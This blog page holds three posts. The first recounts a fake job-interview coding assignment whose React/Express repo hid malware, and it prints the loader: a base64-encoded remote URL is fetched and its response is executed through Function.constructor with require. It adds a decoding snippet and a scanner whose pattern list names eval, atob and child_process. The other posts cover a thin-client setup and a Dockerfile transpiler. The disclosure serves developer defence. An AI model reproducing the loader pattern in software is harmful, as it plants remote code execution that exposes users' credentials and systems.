Friday, October 17, 2025

Almost exploited via a job interview assignment

A few days ago, someone reached out on LinkedIn claiming to represent Koinos Finance's hiring team. Christian Muaña said they were impressed with my background and wanted to move me forward for a Senior Software Engineer position.

The technical interview email came from "Andrew Watson, Senior Engineering Engineer at Koinos" (hire @ koinos .finance) and seemed professional enough. The ask: complete a 45-minute take-home coding assessment, push the results to a public repository, and share the link. Deadline: two business days. Standard tech interview stuff.

Bitbucket and VMs

Andrew sent a Bitbucket link to what looked like a typical full-stack React project. Frontend, backend with Express, routing, the usual. Nothing immediately suspicious.

I clicked the Bitbucket link; probably not great opsec, but I do use Bitbucket. Instead of cloning to my local machine, though, I spun up a Google Cloud VM. Call it paranoia or good practice, but something made me want to keep this at arm's length (well, it is something crypto-related).

Good thing too. I found the malicious code by manually reviewing the files. Never even ran npm install or built the project.

Middleware secrets

Buried in the backend middleware, specifically the cookie-handling code, I found something concerning.

The code fetched data from a remote URL (base64-encoded) via mocki .io, then passed the response to what looked like an innocent "error handler" function. But this wasn't error handling: it used JavaScript's Function constructor (reached via Function.constructor, effectively an eval) to compile and execute whatever code the remote server returned.

// Despite the name, this is not error handling: it compiles and runs
// attacker-supplied source code.
const errorHandler = (error) => {
    const createHandler = (errCode) => {
        // Function.constructor is the Function constructor itself, so this
        // is equivalent to new Function('require', errCode): it turns the
        // remote string into a callable that takes `require` as a parameter.
        const handler = new (Function.constructor)('require', errCode);
        return handler;
    };
    const handlerFunc = createHandler(error);
    // Passing in `require` hands the payload Node's full module system:
    // fs, child_process, network access, everything.
    handlerFunc(require);
};

axios.get(atob(COOKIE_URL)).then(
    // COOKIE_URL is a base64-encoded attacker URL; the "cookie" field of
    // the response is the code that gets executed.
    res => errorHandler(res.data.cookie)
);

Had I started the backend server, it would have downloaded and executed arbitrary code from an attacker-controlled server. Environment variables, API keys, credentials, sensitive files, backdoors: all on the table.
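If you spot a pattern like this, you can find out where it phones home without executing anything. A minimal sketch in Node; the base64 string below is a made-up placeholder, not the value from the actual repo:

// Decode a suspicious base64 string safely; never eval it.
const suspicious = 'aHR0cHM6Ly9leGFtcGxlLmNvbS9wYXlsb2Fk'; // placeholder
console.log(Buffer.from(suspicious, 'base64').toString('utf8'));
// -> https://example.com/payload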

A win for manual code review.

What made it work

The sophistication is what gets me. This wasn't some obvious phishing email with broken English. Professional LinkedIn outreach. Realistic assignment structure. Hosted on Bitbucket, a trusted platform. Actual working React code with the malicious payload hidden in middleware.

The malicious code used innocent function names like errorHandler and getCookie, tucked away in middleware where most developers wouldn't look closely. Who thoroughly audits every line of a take-home assignment before running it?

It's targeted at developers who regularly download and run unfamiliar code as part of their job. That's the genius of it.

The obvious signs

Looking back, the red flags were there:

  • Salary range mentioned immediately.
  • Extreme flexibility: part-time acceptable, even with a current job.
  • "Senior Engineering Engineer" is redundant.
  • Two business days for a 45-minute assessment creates artificial urgency.

But the real red flags were in the code: base64-encoded URLs, remote code execution patterns, obfuscated logic in what should be straightforward middleware.

What this means

This is part of a growing trend of supply chain attacks targeting developers. We're attractive targets because we routinely download and execute code, have access to sensitive systems, and work with valuable intellectual property.

The sophistication is increasing. These aren't just phishing emails anymore; they're fully functional applications with malicious code carefully hidden where it might go unnoticed, hosted on legitimate platforms like Bitbucket for added credibility.

The thing is, the better these attacks get, the more they exploit the fundamental nature of development work. We clone repositories. We run npm install. We execute code. That's the job.

So what do you do? Review code before running it. Use isolated environments: VMs, Docker containers, cloud instances. Use Chromebooks for work! Watch for obfuscation. Be suspicious of too-good-to-be-true offers. Trust your instincts.
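On the obfuscation point, even a crude pre-flight scan would have flagged this repo before any npm install. A quick sketch in Node; the pattern list is illustrative, not exhaustive, and a determined attacker can evade it:

// scan.js: flag risky patterns in a repo before running anything.
// Usage: node scan.js path/to/repo
const fs = require('fs');
const path = require('path');

const RISKY = [/Function\.constructor/, /\batob\(/, /\beval\(/, /child_process/];

const walk = (dir) => {
    for (const entry of fs.readdirSync(dir, { withFileTypes: true })) {
        const full = path.join(dir, entry.name);
        if (entry.isDirectory() && entry.name !== 'node_modules') walk(full);
        else if (/\.(js|mjs|cjs|ts)$/.test(entry.name)) {
            const src = fs.readFileSync(full, 'utf8');
            for (const pattern of RISKY) {
                if (pattern.test(src)) console.log(`${full}: matches ${pattern}`);
            }
        }
    }
};

walk(process.argv[2] ?? '.');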

That nagging feeling that made me use a VM instead of my local machine was spot-on.

Your security is worth more than any job opportunity.

Thursday, October 09, 2025

The Modern Thin Client

For years, the developer community has been locked in a quiet arms race over who has the most powerful laptop. I’ve stepped off that treadmill. My setup is a modern take on the thin client, and it has made my workflow more focused, secure, and flexible.

At its heart, the principle is simple: use a lean local machine that runs only a browser, a terminal, and Visual Studio Code. The core of the work happens on a more powerful computer, which is often just another machine in my home office, accessible over the local network. I use the terminal to SSH into it, and VS Code's Remote Development to edit files directly on that remote machine. The local device becomes a high-fidelity window into a more powerful computer, and since it all runs over the intranet, my work continues uninterrupted even if the internet goes down.
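The moving parts are small. Roughly this, with the hostname, address, and path made up for illustration (the last command assumes VS Code's Remote - SSH extension is installed):

# ~/.ssh/config
Host devbox
    HostName 192.168.1.50
    User me

ssh devbox                                        # day-to-day terminal work
code --remote ssh-remote+devbox ~/projects/myapp  # VS Code editing remote files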

This philosophy is portable. I have a Chromebook that I leave at my in-laws', perfectly set up for this. At home, my primary machine is an older MacBook Pro that runs only Chrome, Terminal, and VS Code. Both devices are just different gateways to the same powerful remote workspace.

This approach has the soul of an old-school UNIX workstation but with a modern editor. The terminal is the control center, but instead of a monochrome vi session, you get the full VS Code experience with all its extensions, running seamlessly on remote files.

A major benefit is the built-in security isolation. In a traditional setup, every script and dependency runs on the same machine as your primary browser with all its logged-in sessions. Here, there's a clear boundary: the local machine is for "trusted" tasks like browsing, while the remote machine is for "untrusted" work. A malicious script on the server cannot touch local browser data.

The most significant power, however, is the ability to scale. I've had situations where I needed parallel builds of separate branches of a resource-heavy project. A single machine couldn't handle two instances at once. With this setup, it was trivial: one VS Code window was connected to a powerful machine running the develop branch, and a second VS Code window was connected to an entirely different server running the feature branch. Each had its own dedicated resources, something impossible with a single laptop.

This model redefines the role of your laptop. It’s not about having a less capable machine, but about building a more capable and resilient system. The power is on the servers, and the local device is just a perfect, secure window into it.

Monday, October 06, 2025

Building a Dockerfile Transpiler

I'm excited to share dxform, a side project I've been working on while searching for my next role: a Dockerfile transpiler that can translate container definitions between different base systems and generate FreeBSD jail configurations.

The concept started simple: what if Dockerfiles could serve as a universal format for defining not just Docker containers, but other containerization systems too? Specifically, I wanted to see if I could use Dockerfiles—which developers already know and love—as the input format for FreeBSD jails.

I have some background building transpilers from a previous job, so I knew the general shape of the problem. But honestly, I expected this to be a much larger undertaking. Two things made it surprisingly manageable:

Dockerfiles are small. Unlike general-purpose programming languages, Dockerfiles have a limited instruction set (FROM, RUN, COPY, ENV, etc.). This meant the core transpiler could stay focused and relatively compact; the toy sketch below gives a feel for how little there is to parse.

AI-assisted development works (mostly). This project became an experiment in how much I could orchestrate AI versus writing code myself. I've been using AI tools so heavily I'm hitting weekly limits. The feedback has been fascinating: AI is surprisingly good at some tasks but still needs human architectural decisions. It's an odd mix where it gets things right and wrong in unexpected places.
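To show how small that instruction surface is, here's a toy sketch in JavaScript, purely illustrative and far simpler than dxform's actual parser, that splits a Dockerfile into instructions while handling comments and line continuations:

// Toy Dockerfile parser: instruction name plus raw arguments.
// Real parsers also handle heredocs, JSON-form arguments, and directives.
const parseDockerfile = (text) =>
    text
        .replace(/\\\r?\n/g, ' ')                        // fold line continuations
        .split(/\r?\n/)
        .map((line) => line.trim())
        .filter((line) => line && !line.startsWith('#')) // drop blanks, comments
        .map((line) => {
            const [, instruction, args] = line.match(/^(\S+)\s*(.*)$/);
            return { instruction: instruction.toUpperCase(), args };
        });

console.log(parseDockerfile('FROM debian:12\nRUN apt-get update && \\\n  apt-get install -y curl'));
// -> FROM debian:12, plus the RUN with its continuation folded onto one line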

Here's where complexity crept in: the biggest challenge wasn't the Dockerfile instructions themselves—it was parsing the shell commands inside RUN instructions.

When you write:

RUN apt-get update && apt-get install -y curl build-essential

The transpiler needs to understand the apt-get install command deeply enough to transform it into its Alpine equivalent:

RUN apk update && apk add curl build-base

This meant building a shell command parser on top of the Dockerfile parser. I used mvdan.cc/sh for this, and it works beautifully for the subset of shell commands that appear in Dockerfiles.

dxform can currently transform between base systems (convert Debian/Ubuntu containers to Alpine and vice versa), translate package managers (automatically mapping ~70 common packages between apt and apk), and preserve your comments and structure.
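Conceptually, the package translation is just a lookup table plus a command rewrite. A simplified sketch of the mapping idea, in JavaScript for illustration, with a regex standing in for the AST-based rewrite dxform actually does via mvdan.cc/sh, and a tiny made-up subset of the table:

// Illustrative apt -> apk rewrite; dxform works on a shell AST instead.
const APT_TO_APK = {
    'build-essential': 'build-base',
    'curl': 'curl',
    'libssl-dev': 'openssl-dev',
};

const rewriteApt = (cmd) =>
    cmd
        .replace(/\bapt-get update\b/g, 'apk update')
        .replace(/\bapt-get install -y\s+([\w.\- ]+)/g, (_, pkgs) =>
            'apk add ' + pkgs.trim().split(/\s+/)
                .map((p) => APT_TO_APK[p] ?? p).join(' '));

console.log(rewriteApt('apt-get update && apt-get install -y curl build-essential'));
// -> apk update && apk add curl build-base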

The most interesting part is the FreeBSD target. The tool has two outputs: --target freebsd-build creates a shell script that sets up ZFS datasets and runs the build commands, while --target freebsd-jail emits the jail configuration itself. Together, these let you take a standard Dockerfile and deploy it to FreeBSD's native containerization system.

dxform transform --target freebsd-build Dockerfile > build.sh

dxform transform --target freebsd-jail Dockerfile > jail.conf
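If you haven't seen FreeBSD's jail.conf format before, the second target emits something in this general shape (a generic, hand-written illustration, not dxform's literal output):

myapp {
    path = "/usr/local/jails/myapp";
    host.hostname = "myapp.local";
    exec.start = "/bin/sh /etc/rc";
    exec.stop = "/bin/sh /etc/rc.shutdown";
    mount.devfs;
}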

It's early days, but the potential is there: Dockerfiles as a universal container definition format, deployable to Docker or FreeBSD jails.

This is very much an experiment and a learning experience. The package mappings could be more comprehensive, the FreeBSD emitter could be more sophisticated, and there are surely edge cases I haven't encountered yet. But it works, and it demonstrates something compelling: with the right abstractions, we can build bridges between different containerization ecosystems.

The project is open source and ready for experimentation. Whether you're interested in cross-platform containers, FreeBSD jails, or the mechanics of building transpilers for domain-specific languages, I'd love to hear your thoughts.

Check out the project on GitHub to see the full source and try it yourself.
